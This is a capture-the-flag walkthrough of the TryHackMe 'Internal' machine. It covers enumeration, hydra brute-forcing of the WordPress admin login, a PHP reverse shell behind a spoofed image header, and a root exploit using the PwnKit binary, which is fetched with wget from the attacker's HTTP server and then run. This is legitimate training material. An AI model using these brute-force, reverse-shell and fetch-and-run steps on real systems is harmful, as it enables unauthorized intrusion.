# Tryhackme - Internal - The Easy Way Walkthrough `` ### **Goal:** Boot to Root ### **1. Enumerations:** I started the room with a few nmap to make sure that I didn't miss any ports: ```shell ┌──(kali㉿kali)-[~] └─$ nmap -Pn -sN 10.10.158.154 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:16 +07 Nmap scan report for 10.10.158.154 (10.10.158.154) Host is up (0.23s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open|filtered ssh 80/tcp open|filtered http Nmap done: 1 IP address (1 host up) scanned in 18.88 seconds ┌──(kali㉿kali)-[~] └─$ nmap -Pn -sN -p- -A --min-rate 8000 -T4 10.10.158.154 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:18 +07 ┌──(kali㉿kali)-[~] └─$ nmap -Pn -sN -p- --min-rate 8000 -T4 10.10.158.154 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:18 +07 Nmap scan report for 10.10.158.154 (10.10.158.154) Host is up (0.23s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open|filtered ssh 80/tcp open|filtered http Nmap done: 1 IP address (1 host up) scanned in 10.42 seconds ┌──(kali㉿kali)-[~] └─$ nmap -Pn -sS -p- --min-rate 8000 -T4 10.10.158.154 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:19 +07 Nmap scan report for 10.10.158.154 (10.10.158.154) Host is up (0.25s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 9.97 seconds ┌──(kali㉿kali)-[~] └─$ nmap -Pn -sS -p- --min-rate 8000 -T4 10.10.158.154 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:20 +07 Nmap scan report for 10.10.158.154 (10.10.158.154) Host is up (0.25s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 12.08 seconds ┌──(kali㉿kali)-[~] └─$ nmap -Pn -sV -A -p 22,80 10.10.158.154 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:40 +07 Nmap scan report for internal.thm (10.10.158.154) Host is up (0.23s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA) | 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA) |_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X OS CPE: cpe:/o:linux:linux_kernel:4.15 OS details: Linux 4.15 Network Distance: 5 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 96.71 ms 10.17.0.1 (10.17.0.1) 2 ... 4 5 231.19 ms internal.thm (10.10.158.154) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.37 seconds ``` I also did some ffuf: ```shell ┌──(kali㉿kali)-[~] └─$ ffuf -ic -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e '' -u "http://10.10.158.154/FUZZ" /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://10.10.158.154/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________ [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 1392ms] blog [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 3354ms] wordpress [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 221ms] javascript [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 218ms] phpmyadmin [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 232ms] [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 233ms] server-status [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 219ms] :: Progress: [220547/220547] :: Job [1/1] :: 138 req/sec :: Duration: [0:22:52] :: Errors: 0 :: ┌──(kali㉿kali)-[~] └─$ ffuf -ic -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e '.php' -u "http://10.10.158.154/FUZZ" /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://10.10.158.154/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt :: Extensions : .php :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________ .php [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 2329ms] blog [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 3314ms] [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 3316ms] wordpress [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 229ms] javascript [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 231ms] phpmyadmin [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 231ms] [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 228ms] .php [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 228ms] server-status [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 218ms] ... ... ``` See that `/blog`, `/wordpress` I immediately visit it, quickly glancing through the source code and also looking into entry points:
From `Wappalyzer` extension, we could see that the site is using `WordPress v5.4.2`. I look for funny entries point for this site as well as running a `wpscan` and a `ssh` enumeration (I did sqlmap but, figured it wasn't the way): Nmap and netcat `ssh` enumeration: ```shell ┌──(kali㉿kali)-[~] └─$ nc -vn 10.10.158.154 22 (UNKNOWN) [10.10.158.154] 22 (ssh) open SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 ^C ┌──(kali㉿kali)-[~] └─$ nmap -p22 10.10.158.154 --script ssh2-enum-algos Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:58 +07 Nmap scan report for internal.thm (10.10.158.154) Host is up (0.23s latency). PORT STATE SERVICE 22/tcp open ssh | ssh2-enum-algos: | kex_algorithms: (10) | curve25519-sha256 | curve25519-sha256@libssh.org | ecdh-sha2-nistp256 | ecdh-sha2-nistp384 | ecdh-sha2-nistp521 | diffie-hellman-group-exchange-sha256 | diffie-hellman-group16-sha512 | diffie-hellman-group18-sha512 | diffie-hellman-group14-sha256 | diffie-hellman-group14-sha1 | server_host_key_algorithms: (5) | ssh-rsa | rsa-sha2-512 | rsa-sha2-256 | ecdsa-sha2-nistp256 | ssh-ed25519 | encryption_algorithms: (6) | chacha20-poly1305@openssh.com | aes128-ctr | aes192-ctr | aes256-ctr | aes128-gcm@openssh.com | aes256-gcm@openssh.com | mac_algorithms: (10) | umac-64-etm@openssh.com | umac-128-etm@openssh.com | hmac-sha2-256-etm@openssh.com | hmac-sha2-512-etm@openssh.com | hmac-sha1-etm@openssh.com | umac-64@openssh.com | umac-128@openssh.com | hmac-sha2-256 | hmac-sha2-512 | hmac-sha1 | compression_algorithms: (2) | none |_ zlib@openssh.com Nmap done: 1 IP address (1 host up) scanned in 1.38 seconds ┌──(kali㉿kali)-[~] └─$ nmap -p22 10.10.158.154 --script ssh-hostkey --script-args ssh_hostkey=full Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 22:59 +07 Nmap scan report for internal.thm (10.10.158.154) Host is up (0.22s latency). PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzpZTvmUlaHPpKH8X2SHMndoS+GsVlbhABHJt4TN/nKUSYeFEHbNzutQnj+DrUEwNMauqaWCY7vNeYguQUXLx4LM5ukMEC8IuJo0rcuKNmlyYrgBlFws3q2956v8urY7/McCFf5IsItQxurCDyfyU/erO7fO02n2iT5k7Bw2UWf8FPvM9/jahisbkA9/FQKou3mbaSANb5nSrPc7p9FbqKs1vGpFopdUTI2dl4OQ3TkQWNXpvaFl0j1ilRynu5zLr6FetD5WWZXAuCNHNmcRo/aPdoX9JXaPKGCcVywqMM/Qy+gSiiIKvmavX6rYlnRFWEp25EifIPuHQ0s8hSXqx5 | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMFOI/P6nqicmk78vSNs4l+vk2+BQ0mBxB1KlJJPCYueaUExTH4Cxkqkpo/zJfZ77MHHDL5nnzTW+TO6e4mDMEw= |_ ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMlxubXGh//FE3OqdyitiEwfA2nNdCtdgLfDQxFHPyY0 Nmap done: 1 IP address (1 host up) scanned in 7.51 seconds ┌──(kali㉿kali)-[~] └─$ nmap -p22 10.10.158.154 --script ssh-auth-methods --script-args="ssh.user=root" Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 23:00 +07 Nmap scan report for internal.thm (10.10.158.154) Host is up (0.22s latency). PORT STATE SERVICE 22/tcp open ssh | ssh-auth-methods: | Supported authentication methods: | publickey |_ password Nmap done: 1 IP address (1 host up) scanned in 5.14 seconds ... ... ``` * Explanation: * `nc -vn 10.10.158.154 22`: Banner Grabbing * `nmap -p22 10.10.158.154 --script ssh2-enum-algos`: Retrieve supported algorythms * `nmap -p22 10.10.158.154 --script ssh-hostkey --script-args ssh_hostkey=full`: Retrieve weak keys * `nmap -p22 10.10.158.154 --script ssh-auth-methods --script-args="ssh.user=root"`: Check authentication methods After that `wpscan`: `wpscan --url http://internal.thm/blog/ --enumerate u,ap,at`: This enumerates: * `u` → usernames * `ap` → all plugins * `at` → all themes ```shell ┌──(kali㉿kali)-[~] └─$ wpscan --url http://internal.thm/blog/ --enumerate u,ap,at _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.28 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://internal.thm/blog/ [10.10.158.154] [+] Started: Mon Jun 2 23:11:24 2025 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.29 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://internal.thm/blog/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10). | Found By: Rss Generator (Passive Detection) | - http://internal.thm/blog/index.php/feed/, https://wordpress.org/?v=5.4.2 | - http://internal.thm/blog/index.php/comments/feed/, https://wordpress.org/?v=5.4.2 [+] WordPress theme in use: twentyseventeen | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/ | Last Updated: 2025-04-15T00:00:00.000Z | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt | [!] The version is out of date, the latest version is 3.9 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 2.3 (80% confidence) | Found By: Style (Passive Detection) | - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3' [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating All Themes (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:25:12 <========================================================================================================================================================> (29685 / 29685) 100.00% Time: 00:25:12 [+] Checking Theme Versions (via Passive and Aggressive Methods) [i] Theme(s) Identified: [+] twentynineteen | Location: http://internal.thm/blog/wp-content/themes/twentynineteen/ | Last Updated: 2025-04-15T00:00:00.000Z | Readme: http://internal.thm/blog/wp-content/themes/twentynineteen/readme.txt | [!] The version is out of date, the latest version is 3.1 | Style URL: http://internal.thm/blog/wp-content/themes/twentynineteen/style.css | Style Name: Twenty Nineteen | Style URI: https://wordpress.org/themes/twentynineteen/ | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Known Locations (Aggressive Detection) | - http://internal.thm/blog/wp-content/themes/twentynineteen/, status: 500 | | Version: 1.5 (80% confidence) | Found By: Style (Aggressive Detection) | - http://internal.thm/blog/wp-content/themes/twentynineteen/style.css, Match: 'Version: 1.5' [+] twentyseventeen | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/ | Last Updated: 2025-04-15T00:00:00.000Z | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt | [!] The version is out of date, the latest version is 3.9 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Urls In Homepage (Passive Detection) | Confirmed By: Known Locations (Aggressive Detection) | - http://internal.thm/blog/wp-content/themes/twentyseventeen/, status: 500 | | Version: 2.3 (80% confidence) | Found By: Style (Aggressive Detection) | - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 2.3' [+] twentytwenty | Location: http://internal.thm/blog/wp-content/themes/twentytwenty/ | Last Updated: 2025-04-15T00:00:00.000Z | Readme: http://internal.thm/blog/wp-content/themes/twentytwenty/readme.txt | [!] The version is out of date, the latest version is 2.9 | Style URL: http://internal.thm/blog/wp-content/themes/twentytwenty/style.css | Style Name: Twenty Twenty | Style URI: https://wordpress.org/themes/twentytwenty/ | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Known Locations (Aggressive Detection) | - http://internal.thm/blog/wp-content/themes/twentytwenty/, status: 500 | | Version: 1.2 (80% confidence) | Found By: Style (Passive Detection) | - http://internal.thm/blog/wp-content/themes/twentytwenty/style.css, Match: 'Version: 1.2' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:01 <==============================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:01 [i] User(s) Identified: [+] admin | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Wp Json Api (Aggressive Detection) | - http://internal.thm/blog/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Mon Jun 2 23:37:01 2025 [+] Requests Done: 29756 [+] Cached Requests: 9 [+] Data Sent: 7.893 MB [+] Data Received: 5.14 MB [+] Memory used: 303.816 MB [+] Elapsed time: 00:25:36 ``` Now I have the `admin` as username, now I need entry point(s):
Founded.
Now I have tried sql, even `sqlmap` with not much of a success, I decided not to use Metasploit and go old school with `hydra`, I captured a request and studied a little: ```http POST /blog/wp-login.php HTTP/1.1 Host: internal.thm User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://internal.thm/blog/wp-login.php Content-Type: application/x-www-form-urlencoded Content-Length: 100 Origin: http://internal.thm Connection: keep-alive Cookie: wordpress_test_cookie=WP+Cookie+check Upgrade-Insecure-Requests: 1 Priority: u=0, i log=a&pwd=a&wp-submit=Log+In&redirect_to=http%3A%2F%2Finternal.thm%2Fblog%2Fwp-admin%2F&testcookie=1 ``` And the error for inputting wrong password: ```html Error: The password you entered for the username admin is incorrect ``` With that I build the command based on hydra command structure: ```shell hydra -l -P . $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:C=cookies:S=Location' ``` ```shell ┌──(kali㉿kali)-[~] └─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt internal.thm http-post-form "/blog/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Finternal.thm%2Fblog%2Fwp-admin%2F&testcookie=1:F=incorrect" -q -t 10 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-03 00:32:07 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore ... ... [STATUS] 1327.00 tries/min, 3981 tries in 00:03h, 14340418 to do in 180:07h, 40 active [80][http-post-form] host: internal.thm login: admin password: my2boys 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-03 00:35:29 ``` With that, I'm in, I did some poke around, I tried upload php shell with spoof jpg header: ```jpg ÿØÿÛ
Setup or netcat and visit `http://internal.thm/blog`, we got our reverse shell: ```shell ┌──(kali㉿kali)-[~] └─$ nc -lvnp 4444 listening on [any] 4444 ... connect to [[YOUR IP]] from (UNKNOWN) [10.10.74.67] 41110 Linux internal 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 18:20:15 up 4 min, 0 users, load average: 0.45, 0.35, 0.17 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) sh: 0: can't access tty; job control turned off $ python3 -c 'import pty; pty.spawn("/bin/bash")' www-data@internal:/$ ``` ### **2. Privilege Escalation:** ```shell www-data@internal:/$ sudo -l sudo -l [sudo] password for www-data: # Well, no sudo -l ``` ```shell www-data@internal:/$ cat /etc/crontab cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # Well, also no crontab ``` ```shell www-data@internal:/$ find / -type f -perm -04000 -ls 2>/dev/null find / -type f -perm -04000 -ls 2>/dev/null 66 40 -rwsr-xr-x 1 root root 40152 Jan 27 2020 /snap/core/9665/bin/mount 80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/9665/bin/ping 81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/9665/bin/ping6 98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/9665/bin/su 116 27 -rwsr-xr-x 1 root root 27608 Jan 27 2020 /snap/core/9665/bin/umount 2605 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/9665/usr/bin/chfn 2607 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/9665/usr/bin/chsh 2683 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/9665/usr/bin/gpasswd 2775 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/9665/usr/bin/newgrp 2788 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/9665/usr/bin/passwd 2898 134 -rwsr-xr-x 1 root root 136808 Jan 31 2020 /snap/core/9665/usr/bin/sudo 2997 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jun 11 2020 /snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper 3367 419 -rwsr-xr-x 1 root root 428240 May 26 2020 /snap/core/9665/usr/lib/openssh/ssh-keysign 6405 109 -rwsr-xr-x 1 root root 110656 Jul 10 2020 /snap/core/9665/usr/lib/snapd/snap-confine 7582 386 -rwsr-xr-- 1 root dip 394984 Feb 11 2020 /snap/core/9665/usr/sbin/pppd 66 40 -rwsr-xr-x 1 root root 40152 Oct 10 2019 /snap/core/8268/bin/mount 80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/8268/bin/ping 81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/8268/bin/ping6 98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/8268/bin/su 116 27 -rwsr-xr-x 1 root root 27608 Oct 10 2019 /snap/core/8268/bin/umount 2665 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/8268/usr/bin/chfn 2667 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/8268/usr/bin/chsh 2743 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/8268/usr/bin/gpasswd 2835 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/8268/usr/bin/newgrp 2848 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/8268/usr/bin/passwd 2958 134 -rwsr-xr-x 1 root root 136808 Oct 11 2019 /snap/core/8268/usr/bin/sudo 3057 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jun 10 2019 /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper 3427 419 -rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/8268/usr/lib/openssh/ssh-keysign 6462 105 -rwsr-sr-x 1 root root 106696 Dec 6 2019 /snap/core/8268/usr/lib/snapd/snap-confine 7636 386 -rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/8268/usr/sbin/pppd 262330 44 -rwsr-xr-x 1 root root 43088 Mar 5 2020 /bin/mount 262361 28 -rwsr-xr-x 1 root root 26696 Mar 5 2020 /bin/umount 262265 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping 262214 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount 262281 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su 880 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils 592 76 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd 702 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp 703 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap 497 76 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn 701 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap 719 60 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd 499 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh 446 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at 844 148 -rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo 739 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec 1072 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device 7392 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic 1258 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1 6867 112 -rwsr-xr-x 1 root root 113528 Jul 10 2020 /usr/lib/snapd/snap-confine 1254 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign 7214 44 -rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper www-data@internal:/$ pkexec --version pkexec --version pkexec version 0.105 ``` pkexec? again? Like 3 rooms already. Anyway, let's upload the PwnKit to finish get to root privilege of this machine: ```sh ┌──(kali㉿kali)-[~/Downloads] └─$ curl -fsSL https://raw.githu busercontent.com/ ly4k/P wnKit/ main/PwnKit -o PwnKit #I have Eset Smart Security hunting CVE on my Machine so I have to leave spaces. ┌──(kali㉿kali)-[~/Downloads] └─$ chmod +x PwnKit ┌──(kali㉿kali)-[~/Downloads] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... ``` ```shell www-data@internal:/$ cd /tmp cd /tmp www-data@internal:/tmp$ wget http://[YOUR IP]:80/PwnKit wget http://[YOUR IP]:80/PwnKit --2025-06-02 18:33:35-- http://[YOUR IP]/PwnKit Connecting to [YOUR IP]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 18040 (18K) [application/octet-stream] Saving to: 'PwnKit' PwnKit 100%[===================>] 17.62K 74.0KB/s in 0.2s 2025-06-02 18:33:36 (74.0 KB/s) - 'PwnKit' saved [18040/18040] www-data@internal:/tmp$ chmod +x PwnKit chmod +x PwnKit www-data@internal:/tmp$ ./PwnKit ./PwnKit root@internal:/tmp# cd /root cd /root root@internal:~# ls ls root.txt snap root@internal:~# cat root.txt cat root.txt THM{d0XXXXXXXXXXXXXXX #hidden root@internal:~# cd / cd / root@internal:/# ls ls bin dev initrd.img lib64 mnt root snap sys var boot etc initrd.img.old lost+found opt run srv tmp vmlinuz cdrom home lib media proc sbin swap.img usr vmlinuz.old root@internal:/# cd /home cd /home root@internal:/home# ls ls aubreanna root@internal:/home# cd aubreanna cd aubreanna root@internal:/home/aubreanna# ls ls jenkins.txt snap user.txt root@internal:/home/aubreanna# cat user.txt cat user.txt THM{int3XXXXXXXXXXXXX #hidden root@internal:/home/aubreanna# ```